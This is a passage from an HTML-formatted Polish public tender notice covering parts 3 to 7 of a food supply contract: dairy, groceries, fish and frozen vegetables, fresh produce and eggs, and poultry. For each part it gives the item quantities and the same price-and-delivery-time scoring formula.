)- 40 % będą liczone w następujący sposób: <br/>	W kryterium „Termin realizacji zamówienia” oceniany będzie termin zadeklarowany przez Wykonawcę, zgodnie z poniższą tabelą. Oferty będą oceniane według następującego wzoru:<br/><br/>Lp.	Termin realizacji zamówienia	Liczba punktów<br/>1	W terminie 3 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	00,00<br/>2.	W terminie 2 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	20,00<br/>3	W terminie 1 dnia roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	40,00<br/><br/>T- ilość punktów za termin wykonania zamówienia.<br/>Zamawiający przyzna maksymalną ilość punktów tj. 40,00 (przy uwzględnieniu wagi wynoszącej 40,00%) Wykonawcy, który zaoferuje termin wykonania zamówienia 1 dnia od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>W pozostałych ofertach, punkty zostaną przekazane zgodnie z powyższą tabelą.<br/>UWAGA:<br/>Niepodanie w ofercie terminu realizacji dostaw będzie skutkowało uznaniem, że Wykonawca deklaruje termin dostaw – 3 dni robocze od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>Zaproponowanie terminu dłuższego lub innego niż określony w tabeli będzie skutkować odrzuceniem oferty jako niezgodnej z SWZ.<br/>17.4 Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/> O= C+T<br/> Gdzie:<br/> O- łączna ilość punktów oferty ocenianej<br/> C- liczba punktów uzyskanych w kryterium „Cena”<br/> T – liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III – Produkty mleczarskie <br/>1.	Jogurt grecki	400g	szt.	50<br/>2.	Jogurt owocowy	150g	szt.	2000<br/>3.	Jogurt pitny owocowy	250g	szt. 400<br/>4.	Masło 82%	200g	kg	300<br/>5.	Masło roślinne	500g	szt.	350<br/>6.	Maślanka owocowa	1L	szt.	100<br/>7.	Mleko 2%	1L	szt.	3000<br/>8.	Ser feta półtłusty	270g	szt.	80<br/>9.	Ser topiony -bloczek	140g	szt.	100<br/>10.	Ser topiony-plaster	130g	szt.	200<br/>11.	Ser żółty półtłusty	blok ok. 3kg	kg	700<br/>12.	Serek wanilia homogenizowany	135g	szt.	750<br/>13.	Serek wiejski	150g	szt.	500<br/>14.	Śmietana 18% 1L	szt. 500<br/>15.	Twaróg półtłusty	ok. 1kg	kg	400 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części oddzielnie:<br/>1	Cena (C)	60<br/>2	Termin realizacji zamówienia (T)	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/><br/>17.2. Kryterium „Cena” (C ) - 60% będzie rozpatrywana na podstawie ceny brutto danej części zamówienia, podanej przez Wykonawcę w ofercie.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru: <br/> Cena min. (Cn)<br/>Cena(C) = ---------------------- x 60 pkt<br/> Cena Bad. of. (Cb)<br/>gdzie: <br/>C – ilość punktów za kryterium cena,<br/>Cn– cena brutto oferty najniższej spośród ofert nieodrzuconych, <br/>Cb – cena brutto oferty badanej oferty. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku<br/>Maksymalna ilość punktów, jaką może uzyskać Wykonawca w kryterium cena – 60 pkt.<br/>17.3. Punkty za kryterium „Termin realizacji zamówienia’’ (T )- 40 % będą liczone w następujący sposób: <br/>	W kryterium „Termin realizacji zamówienia” oceniany będzie termin zadeklarowany przez Wykonawcę, zgodnie z poniższą tabelą. Oferty będą oceniane według następującego wzoru:<br/><br/>Lp.	Termin realizacji zamówienia	Liczba punktów<br/>1	W terminie 3 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	00,00<br/>2.	W terminie 2 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	20,00<br/>3	W terminie 1 dnia roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	40,00<br/><br/>T- ilość punktów za termin wykonania zamówienia.<br/>Zamawiający przyzna maksymalną ilość punktów tj. 40,00 (przy uwzględnieniu wagi wynoszącej 40,00%) Wykonawcy, który zaoferuje termin wykonania zamówienia 1 dnia od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>W pozostałych ofertach, punkty zostaną przekazane zgodnie z powyższą tabelą.<br/>UWAGA:<br/>Niepodanie w ofercie terminu realizacji dostaw będzie skutkowało uznaniem, że Wykonawca deklaruje termin dostaw – 3 dni robocze od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>Zaproponowanie terminu dłuższego lub innego niż określony w tabeli będzie skutkować odrzuceniem oferty jako niezgodnej z SWZ.<br/>17.4 Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/> O= C+T<br/> Gdzie:<br/> O- łączna ilość punktów oferty ocenianej<br/> C- liczba punktów uzyskanych w kryterium „Cena”<br/> T – liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV– Różne artykuły spożywcze <br/>1.	Ananasy w puszce	560g	szt.	15<br/>2.	Bazylia suszona	20g	szt.	40<br/>3.	Brzoskwinia w puszce	820g	szt.	15<br/>4.	Budyń śmietankowy/waniliowy	20g	szt.	100<br/>5.	Chrzan tarty-50% chrzanu	160g	szt.	60<br/>6.	Cukier biały	1kg	kg	500<br/>7.	Cukier puder	500g szt.	30<br/>8.	Cukier waniliowy	20g	szt.	60<br/>9.	Cynamon	20g	szt.	20<br/>10.	Czekolada mleczna/truskawka/toffi	100g	szt.	400<br/>11.	Czosnek granulowany	20g	szt.	50<br/>12.	Dżem brzoskwiniowy	280g	szt.	150<br/>13.	Dżem porzeczkowy	280g	szt.	150<br/>14.	Dżem truskawkowy 280g	szt.	150<br/>15.	Dżem wiśniowy	280g	szt.	150<br/>16.	Groszek konserwowy	400g	szt.	60<br/>17.	Herbata granulowana	100g	szt.	100<br/>18.	Herbata owocowa -ekspresowa	50g	opak.	40<br/>19.	Kakao ciemne 10-12% tłuszczu kakaowego	100g	szt..	40<br/>20.	Kasza gryczana	1kg	kg	100<br/>21.	Kasza jęczmienna 1kg kg	100<br/>22.	Kasza manna	500g	szt.	10<br/>23.	Kawa zbożowa -Inka	150g	szt.	30<br/>24.	Ketchup łagodny pomidory-62%	500g	szt.	100<br/>25.	Kisiel cytrynowy/truskawkowy	20g	szt.	100<br/>26.	Koncentrat pomidorowy 30%	200g	szt.	200<br/>27.	Koperek suszony	20g	szt.	40<br/>28.	Kucharek -przyprawa	5kg	kg	10<br/>29.	Kukurydza konserwowa	400g	szt.	100<br/>30.	Kurkuma	20g	szt.	10<br/>31.	Kwasek cytrynowy	20g	szt.	40<br/>32.	Liść laurowy	15g	szt.	10<br/>33.	Maggi-przyprawa w płynie	1L	szt.	24<br/>34.	Majeranek 20g	szt.	60<br/>35.	Majonez dekoracyjny	700g	szt.	60<br/>36.	Makaron kokardy	1kg	kg	80<br/>37.	Makaron łazanka	500g	szt.	80<br/>38.	Makaron muszelki - małe	500g	szt.	25<br/>39.	Makaron nitki rosołowe	250g	szt.	150<br/>40.	Makaron ryż	500g	szt.	20<br/>41.	Makaron spaghetti	400g	szt.	150<br/>42.	Makaron świderki 1kg	kg	350<br/>43.	Mąka pszenna typ 550	1kg	kg	250<br/>44.	Mąka ziemniaczana	1kg	kg	25<br/>45.	Musztarda	180g	szt.	60<br/>46.	Natka suszona	20g	szt.	20<br/>47.	Ocet jabłkowy	500ml	szt.	24<br/>48.	Ocet spirytusowy	500ml	szt.	24<br/>49.	Ogórek konserwowy	900ml	szt.	60<br/>50.	Olej rzepakowy	1L	szt.	300<br/>51.	Oregano	20g	szt.	40<br/>52.	Papryka słodka	20g	szt.	150<br/>53.	Passata pomidorowa	700ml	szt.	30<br/>54.	Pasztet drobiowy	135g	szt.	200<br/>55.	Pieprz naturalny	20g	szt.	150<br/>56.	Pieprz ziołowy	20g	szt.	40<br/>57.	Płatki kukurydziane	500g	szt.	100<br/>58.	Płatki ryżowe 500g	szt.	10<br/>59.	Przyprawa do drobiu	1kg	szt.	4<br/>60.	Przyprawa do mięs	1kg	szt.	4<br/>61.	Przyprawa do ryb i owoców morza	900g	szt.	4<br/>62.	Przyprawa do ziemniaków	1kg	szt.	2<br/>63.	Rozmaryn	20g	szt.	20<br/>64.	Ryż biały	1kg	kg	150<br/>65.	Ryż brązowy	500g	szt.	40<br/>66.	Seler konserwowy	370g	szt.	24<br/>67.	Sos ogrodowy	700g	szt.	8<br/>68.	Sos sojowy	125 ml	szt.	12<br/>69.	Sól kłodawska	1kg	kg	250<br/>70.	Ziele angielskie	15g	szt.	100<br/>71.	Zioła prowansalskie	20g	szt.	20 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części oddzielnie:<br/>1	Cena (C)	60<br/>2	Termin realizacji zamówienia (T)	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/><br/>17.2. Kryterium „Cena” (C ) - 60% będzie rozpatrywana na podstawie ceny brutto danej części zamówienia, podanej przez Wykonawcę w ofercie.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru: <br/> Cena min. (Cn)<br/>Cena(C) = ---------------------- x 60 pkt<br/> Cena Bad. of. (Cb)<br/>gdzie: <br/>C – ilość punktów za kryterium cena,<br/>Cn– cena brutto oferty najniższej spośród ofert nieodrzuconych, <br/>Cb – cena brutto oferty badanej oferty. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku<br/>Maksymalna ilość punktów, jaką może uzyskać Wykonawca w kryterium cena – 60 pkt.<br/>17.3. Punkty za kryterium „Termin realizacji zamówienia’’ (T )- 40 % będą liczone w następujący sposób: <br/>	W kryterium „Termin realizacji zamówienia” oceniany będzie termin zadeklarowany przez Wykonawcę, zgodnie z poniższą tabelą. Oferty będą oceniane według następującego wzoru:<br/><br/>Lp.	Termin realizacji zamówienia	Liczba punktów<br/>1	W terminie 3 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	00,00<br/>2.	W terminie 2 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	20,00<br/>3	W terminie 1 dnia roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	40,00<br/><br/>T- ilość punktów za termin wykonania zamówienia.<br/>Zamawiający przyzna maksymalną ilość punktów tj. 40,00 (przy uwzględnieniu wagi wynoszącej 40,00%) Wykonawcy, który zaoferuje termin wykonania zamówienia 1 dnia od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>W pozostałych ofertach, punkty zostaną przekazane zgodnie z powyższą tabelą.<br/>UWAGA:<br/>Niepodanie w ofercie terminu realizacji dostaw będzie skutkowało uznaniem, że Wykonawca deklaruje termin dostaw – 3 dni robocze od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>Zaproponowanie terminu dłuższego lub innego niż określony w tabeli będzie skutkować odrzuceniem oferty jako niezgodnej z SWZ.<br/>17.4 Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/> O= C+T<br/> Gdzie:<br/> O- łączna ilość punktów oferty ocenianej<br/> C- liczba punktów uzyskanych w kryterium „Cena”<br/> T – liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ V – Ryby, konserwy rybne i warzywa mrożone<br/>1.	Brokuł mrożony 2,50 kg	opak.	100<br/>2.	Brukselka	2,50 kg	opak.	10<br/>3.	Fasolka szparagowa mrożona 2,50 kg	opak.	50<br/>4.	Filet śledziowy bez skóry w zalewie solonej	1kg	kg	40<br/>5.	Filet z ryby morszczuk bez skóry	1 kg	kg	200<br/>6.	Kalafior mrożony	2,50 kg	opak.	100<br/>7.	Makrela wędzona	1kg	kg	30<br/>8.	Marchewka mini	2,50 kg	opak.	25<br/>9.	Paprykarz szczeciński	300g	szt.	50<br/>10.	Szpinak mrożony	2,50 kg	opak.	40<br/>11.	Szprot w oleju	170g	szt.	150<br/>12.	Szprot w sosie pomidorowym	170g	szt.	150<br/>13.	Bób mrożony	1kg	kg	30 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części oddzielnie:<br/>1	Cena (C)	60<br/>2	Termin realizacji zamówienia (T)	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/><br/>17.2. Kryterium „Cena” (C ) - 60% będzie rozpatrywana na podstawie ceny brutto danej części zamówienia, podanej przez Wykonawcę w ofercie.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru: <br/> Cena min. (Cn)<br/>Cena(C) = ---------------------- x 60 pkt<br/> Cena Bad. of. (Cb)<br/>gdzie: <br/>C – ilość punktów za kryterium cena,<br/>Cn– cena brutto oferty najniższej spośród ofert nieodrzuconych, <br/>Cb – cena brutto oferty badanej oferty. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku<br/>Maksymalna ilość punktów, jaką może uzyskać Wykonawca w kryterium cena – 60 pkt.<br/>17.3. Punkty za kryterium „Termin realizacji zamówienia’’ (T )- 40 % będą liczone w następujący sposób: <br/>	W kryterium „Termin realizacji zamówienia” oceniany będzie termin zadeklarowany przez Wykonawcę, zgodnie z poniższą tabelą. Oferty będą oceniane według następującego wzoru:<br/><br/>Lp.	Termin realizacji zamówienia	Liczba punktów<br/>1	W terminie 3 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	00,00<br/>2.	W terminie 2 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	20,00<br/>3	W terminie 1 dnia roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	40,00<br/><br/>T- ilość punktów za termin wykonania zamówienia.<br/>Zamawiający przyzna maksymalną ilość punktów tj. 40,00 (przy uwzględnieniu wagi wynoszącej 40,00%) Wykonawcy, który zaoferuje termin wykonania zamówienia 1 dnia od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>W pozostałych ofertach, punkty zostaną przekazane zgodnie z powyższą tabelą.<br/>UWAGA:<br/>Niepodanie w ofercie terminu realizacji dostaw będzie skutkowało uznaniem, że Wykonawca deklaruje termin dostaw – 3 dni robocze od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>Zaproponowanie terminu dłuższego lub innego niż określony w tabeli będzie skutkować odrzuceniem oferty jako niezgodnej z SWZ.<br/>17.4 Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/> O= C+T<br/> Gdzie:<br/> O- łączna ilość punktów oferty ocenianej<br/> C- liczba punktów uzyskanych w kryterium „Cena”<br/> T – liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ VI – Owoce i warzywa świeże, jaja <br/>1.	Banan kg	800<br/>2.	Botwina Pęczek <br/>20-30dag	20<br/>3.	Brzoskwinia	kg 250<br/>4.	Burak czerwony	kg	200<br/>5.	Cebula biała	kg 400<br/>6.	Cebula czerwona	kg	50<br/>7.	Cytryna	kg	80<br/>8.	Czosnek	szt.	300<br/>9.	Fasola biała	kg	50<br/>10.	Groch żółty łupany	kg	50<br/>11.	Gruszka	kg	300<br/>12.	Jabłka	kg	3000<br/>13.	Jajka	szt.	500<br/>14.	Kapusta biała	kg	300<br/>15.	Kapusta kiszona	kg	200<br/>16.	Kapusta młoda	szt.	250<br/>17.	Kapusta pekińska	kg 200<br/>18.	Kiwi	kg 250<br/>19.	Koper świeży	Pęczek/ok. 20dag	800<br/>20.	Mandarynka	kg 500<br/>21.	Marchewka kg	500<br/>22.	Natka pietruszki	Pęczek/ok. 20 dag	600<br/>23.	Nektarynka	kg	250<br/>24.	Ogórek kiszony	kg	180<br/>25.	Ogórek świeży	kg 500<br/>26.	Papryka czerwona/żółta	kg 250<br/>27.	Pieczarka	kg 250<br/>28.	Pietruszka korzeń	kg 180<br/>29.	Pomarańcza	kg	750<br/>30.	Pomidor	kg 500<br/>31.	Por	kg	60<br/>32.	Rzodkiewka	Pęczek/10<br/>szt.	100<br/>33.	Sałata lodowa	szt.	250<br/>34.	Sałata masłowa	szt.	250<br/>35.	Seler korzeń	kg 120<br/>36.	Szczaw	Pęczek/ok. 20dag	60<br/>37.	Szczypiorek szt. 250<br/>38.	Śliwka kg	250<br/>39.	Truskawka	kg	50<br/>40.	Ziemniaki młode	kg	700<br/>41.	Ziemniaki stare	kg	3000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331100-8 - Warzywa świeże lub mrożone</p> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części oddzielnie:<br/>1	Cena (C)	60<br/>2	Termin realizacji zamówienia (T)	40<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/><br/>17.2. Kryterium „Cena” (C ) - 60% będzie rozpatrywana na podstawie ceny brutto danej części zamówienia, podanej przez Wykonawcę w ofercie.<br/>Ilość punktów w tym kryterium zostanie obliczona na podstawie poniższego wzoru: <br/> Cena min. (Cn)<br/>Cena(C) = ---------------------- x 60 pkt<br/> Cena Bad. of. (Cb)<br/>gdzie: <br/>C – ilość punktów za kryterium cena,<br/>Cn– cena brutto oferty najniższej spośród ofert nieodrzuconych, <br/>Cb – cena brutto oferty badanej oferty. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku<br/>Maksymalna ilość punktów, jaką może uzyskać Wykonawca w kryterium cena – 60 pkt.<br/>17.3. Punkty za kryterium „Termin realizacji zamówienia’’ (T )- 40 % będą liczone w następujący sposób: <br/>	W kryterium „Termin realizacji zamówienia” oceniany będzie termin zadeklarowany przez Wykonawcę, zgodnie z poniższą tabelą. Oferty będą oceniane według następującego wzoru:<br/><br/>Lp.	Termin realizacji zamówienia	Liczba punktów<br/>1	W terminie 3 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	00,00<br/>2.	W terminie 2 dni roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	20,00<br/>3	W terminie 1 dnia roboczych od dnia przekazania zamówienia telefonicznie lub e-mailem	40,00<br/><br/>T- ilość punktów za termin wykonania zamówienia.<br/>Zamawiający przyzna maksymalną ilość punktów tj. 40,00 (przy uwzględnieniu wagi wynoszącej 40,00%) Wykonawcy, który zaoferuje termin wykonania zamówienia 1 dnia od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>W pozostałych ofertach, punkty zostaną przekazane zgodnie z powyższą tabelą.<br/>UWAGA:<br/>Niepodanie w ofercie terminu realizacji dostaw będzie skutkowało uznaniem, że Wykonawca deklaruje termin dostaw – 3 dni robocze od dnia przekazania zamówienia telefonicznie lub e-mailem.<br/>Zaproponowanie terminu dłuższego lub innego niż określony w tabeli będzie skutkować odrzuceniem oferty jako niezgodnej z SWZ.<br/>17.4 Za najkorzystniejszą ofertę w danej części zamówienia zostanie uznana oferta, która otrzyma największą ilość punktów (O) obliczoną na podstawie wzoru:<br/> O= C+T<br/> Gdzie:<br/> O- łączna ilość punktów oferty ocenianej<br/> C- liczba punktów uzyskanych w kryterium „Cena”<br/> T – liczba punktów uzyskanych w kryterium „Termin realizacji zamówienia”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ VII – Drób <br/>1.	Porcje rosołowe -korpusy całe ze skrzydełkami	kg	kg	120<br/>2.	Filet drobiowy surowy - świeży	kg	kg	250<br/>3.	Udka -ćwiartka świeża	kg	kg	200<br/>4.	Udziec drobiowy -świeży	kg	kg	300<br/>5.	Wątróbka drobiowa	kg	kg	80 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla każdej części oddzielnie:<br/>1	Cena (C)	60<br/>2	Termin realizacji 